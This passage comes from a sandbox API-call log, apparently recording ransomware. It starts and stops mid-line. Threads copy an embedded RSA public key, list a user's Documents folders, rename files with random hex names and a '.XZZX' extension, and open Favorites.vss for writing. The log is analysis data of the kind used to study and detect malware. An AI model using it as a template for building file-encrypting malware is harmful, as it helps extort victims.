MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.131] lstrcpyW (in: lpString1=0x2daf460, lpString2="73C0D9902A7964C0808D031B2E914908.XZZX" | out: lpString1="73C0D9902A7964C0808D031B2E914908.XZZX") returned="73C0D9902A7964C0808D031B2E914908.XZZX" [0235.131] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0235.131] SetErrorMode (uMode=0x1) returned 0x1 [0235.131] lstrcpyW (in: lpString1=0x2daf860, lpString2="73C0D9902A7964C0808D031B2E914908.XZZX" | out: lpString1="73C0D9902A7964C0808D031B2E914908.XZZX") returned="73C0D9902A7964C0808D031B2E914908.XZZX" [0235.132] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x807bc012, Data2=0x75d1, Data3=0x4a52, Data4=([0]=0xb8, [1]=0x31, [2]=0x85, [3]=0xba, [4]=0x3d, [5]=0x76, [6]=0x42, [7]=0xc9))) returned 0x0 [0235.132] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\73C0D9902A7964C0808D031B2E914908.XZZX") returned 118 [0235.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0235.132] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\73D008B2223426F2807BC012250F0B3A.XZZX") returned 118 [0235.132] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 916 os_tid = 0x1158 [0235.286] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.286] lstrcpyW (in: lpString1=0x2daf460, lpString2="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" | out: lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" [0235.286] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0235.286] SetErrorMode (uMode=0x1) returned 0x1 [0235.286] lstrcpyW (in: lpString1=0x2daf860, lpString2="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" | out: lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" [0235.286] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xb4beb221, Data2=0xc8, Data3=0x4312, Data4=([0]=0x98, [1]=0xb0, [2]=0xd7, [3]=0xfb, [4]=0x7b, [5]=0x1d, [6]=0xbf, [7]=0xfe))) returned 0x0 [0235.286] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned 118 [0235.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0235.286] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\34FB29C800346610B4BEB221030F4A58.XZZX") returned 118 [0235.286] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 917 os_tid = 0x115c [0235.441] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.441] lstrcpyW (in: lpString1=0x2daf460, lpString2="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" | out: lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" [0235.441] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0235.441] SetErrorMode (uMode=0x1) returned 0x1 [0235.441] lstrcpyW (in: lpString1=0x2daf860, lpString2="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" | out: lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" [0235.441] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x5d18cbe3, Data2=0x37e, Data3=0x47d4, Data4=([0]=0xbe, [1]=0xfe, [2]=0x96, [3]=0x3b, [4]=0x73, [5]=0xcb, [6]=0x5b, [7]=0x25))) returned 0x0 [0235.441] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned 118 [0235.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0235.441] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\1C9802BA00FAD6585D18CBE303D5BAA0.XZZX") returned 118 [0235.441] StrStrW (lpFirst="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 918 os_tid = 0x1160 [0235.598] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.598] lstrcpyW (in: lpString1=0x2daf460, lpString2="E3E55C1830B142FC6C2B225E34DE2744.XZZX" | out: lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned="E3E55C1830B142FC6C2B225E34DE2744.XZZX" [0235.598] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0235.598] SetErrorMode (uMode=0x1) returned 0x1 [0235.598] lstrcpyW (in: lpString1=0x2daf860, lpString2="E3E55C1830B142FC6C2B225E34DE2744.XZZX" | out: lpString1="E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned="E3E55C1830B142FC6C2B225E34DE2744.XZZX" [0235.598] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xba3aa49f, Data2=0xd8ba, Data3=0x4f31, Data4=([0]=0x8b, [1]=0x50, [2]=0xc3, [3]=0x75, [4]=0xe9, [5]=0x6c, [6]=0xa4, [7]=0x6a))) returned 0x0 [0235.599] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\E3E55C1830B142FC6C2B225E34DE2744.XZZX") returned 118 [0235.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0235.599] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\C981C386430AE19ABA3AA49F45E5C5E2.XZZX") returned 118 [0235.599] StrStrW (lpFirst="E3E55C1830B142FC6C2B225E34DE2744.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 919 os_tid = 0x1164 [0235.753] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.753] lstrcpyW (in: lpString1=0x2daf460, lpString2="F8F047460EB3954ECCCBC0D612CB7996.XZZX" | out: lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned="F8F047460EB3954ECCCBC0D612CB7996.XZZX" [0235.753] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0235.753] SetErrorMode (uMode=0x1) returned 0x1 [0235.753] lstrcpyW (in: lpString1=0x2daf860, lpString2="F8F047460EB3954ECCCBC0D612CB7996.XZZX" | out: lpString1="F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned="F8F047460EB3954ECCCBC0D612CB7996.XZZX" [0235.753] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x83a8ec0e, Data2=0x7b78, Data3=0x40b0, Data4=([0]=0xb2, [1]=0xf6, [2]=0xd7, [3]=0x1d, [4]=0xbd, [5]=0x8a, [6]=0xd2, [7]=0xb2))) returned 0x0 [0235.753] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\F8F047460EB3954ECCCBC0D612CB7996.XZZX") returned 118 [0235.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0235.753] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\E09960901F32E28083A8EC0E220DC6C8.XZZX") returned 118 [0235.753] StrStrW (lpFirst="F8F047460EB3954ECCCBC0D612CB7996.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 920 os_tid = 0x1168 [0235.915] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0235.915] lstrcpyW (in: lpString1=0x2daf460, lpString2="BF7B86490294F06B45AC44D706ACD4B3.XZZX" | out: lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned="BF7B86490294F06B45AC44D706ACD4B3.XZZX" [0235.915] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0235.915] SetErrorMode (uMode=0x1) returned 0x1 [0235.915] lstrcpyW (in: lpString1=0x2daf860, lpString2="BF7B86490294F06B45AC44D706ACD4B3.XZZX" | out: lpString1="BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned="BF7B86490294F06B45AC44D706ACD4B3.XZZX" [0235.915] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xe3485a30, Data2=0x1d56, Data3=0x48f0, Data4=([0]=0x93, [1]=0x56, [2]=0x84, [3]=0xcf, [4]=0xc2, [5]=0x71, [6]=0x76, [7]=0x73))) returned 0x0 [0235.915] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\BF7B86490294F06B45AC44D706ACD4B3.XZZX") returned 91 [0235.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0235.915] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\8C85BC20085BB0A0E3485A300B3694E8.XZZX") returned 91 [0235.915] StrStrW (lpFirst="BF7B86490294F06B45AC44D706ACD4B3.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 921 os_tid = 0x116c [0236.068] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.068] lstrcpyW (in: lpString1=0x2daf460, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0236.068] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0236.068] SetErrorMode (uMode=0x1) returned 0x1 [0236.068] lstrcpyW (in: lpString1=0x2daf860, lpString2="Favorites.vss" | out: lpString1="Favorites.vss") returned="Favorites.vss" [0236.068] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x8b9d28dd, Data2=0xf225, Data3=0x41b2, Data4=([0]=0xa4, [1]=0x4, [2]=0xf8, [3]=0x8d, [4]=0xdc, [5]=0x56, [6]=0x29, [7]=0xa1))) returned 0x0 [0236.069] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0236.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0236.069] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\BE57D1F13E23C2BA8B9D28DD40FEA702.XZZX") returned 91 [0236.069] StrStrW (lpFirst="Favorites.vss", lpSrch="XZZX") returned 0x0 [0236.069] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss", dwFileAttributes=0x20) returned 1 [0236.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11dc [0236.069] CreateFileMappingW (hFile=0x11dc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 Thread: id = 922 os_tid = 0x1170 [0236.225] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.225] lstrcpyW (in: lpString1=0x2daf460, lpString2="7B7BA3C4205941180FE9457124712560.XZZX" | out: lpString1="7B7BA3C4205941180FE9457124712560.XZZX") returned="7B7BA3C4205941180FE9457124712560.XZZX" [0236.225] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0236.225] SetErrorMode (uMode=0x1) returned 0x1 [0236.225] lstrcpyW (in: lpString1=0x2daf860, lpString2="7B7BA3C4205941180FE9457124712560.XZZX" | out: lpString1="7B7BA3C4205941180FE9457124712560.XZZX") returned="7B7BA3C4205941180FE9457124712560.XZZX" [0236.225] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x7b8f3fa9, Data2=0xd76f, Data3=0x4697, Data4=([0]=0x80, [1]=0x21, [2]=0x36, [3]=0xa3, [4]=0x3c, [5]=0x25, [6]=0xa8, [7]=0xfe))) returned 0x0 [0236.225] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\7B7BA3C4205941180FE9457124712560.XZZX") returned 100 [0236.225] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0236.225] wsprintfW (in: 